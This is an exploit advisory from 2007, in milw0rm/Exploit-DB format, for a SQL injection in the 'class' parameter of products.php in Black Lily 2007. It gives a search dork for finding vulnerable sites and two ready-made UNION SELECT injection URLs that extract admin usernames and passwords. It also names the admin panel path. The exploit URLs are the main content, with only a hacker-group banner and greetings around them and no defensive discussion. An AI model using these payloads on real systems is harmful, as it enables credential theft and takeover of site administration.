Black Lily 2007 - 'products.php?class' SQL Injection

EDB-ID:

4444

CVE:

N/A




Platform:

PHP

Date:

2007-09-22


#######################SnIper-sa.com################################
#                                                                  #
#  SSSSS      nnn        nn   ii  ppppppp  eeeeeeeee   rrrrr       #
# ss          nn nn      nn   ii  pp    p  ee          rr   rr     #
#s            nn  nn     nn   ii  pp    p  ee          rr     r    #
# ss          nn   nn    nn   ii  ppppppp  ee          rr   rr     #
#   sssss     nn    nn   nn   ii  pp       eeeeee      rrrr        #
#        ss   nn     nn  nn   ii  pp       ee          rrrr        #
#          s  nn      nn nn   ii  pp       ee          rr  rr      #
#        ss   nn        nnn   ii  pp       ee          rr   rr     #
#   sssss     nn        nnn   ii  pp       eeeeeeeeee  rr     rr   #
#                                                                  #
#####################VerY-SecReT####################################
####################################

 found by :
               VerY SecReT
###########
HomePage : WwW.SnIpEr-Sa.Com
##################

 Dork :  "Powered By The Black Lily 2007"
####################################

EXPLOIT:
  http://victim.com/ar/products.php?class=-1%20union%20select%201,2,password,4,username%20from%20admin/*

 or

http://victim.com/en/products.php?class=-1%20union%20select%201,2,3,password,username%20from%20admin/*

########################################

Admin Panel is in  http://victim.com/xx/admin/

#####################################

 S.GreetZ: sniper-sa.com & sniper-sa & Rafoo
#############################
thanx :  shoot3r , Devil-X ,ReMOTeR , and all sniper members

##############

contact-mail : SecReT@SecuRitY.Com.Sa

# milw0rm.com [2007-09-22]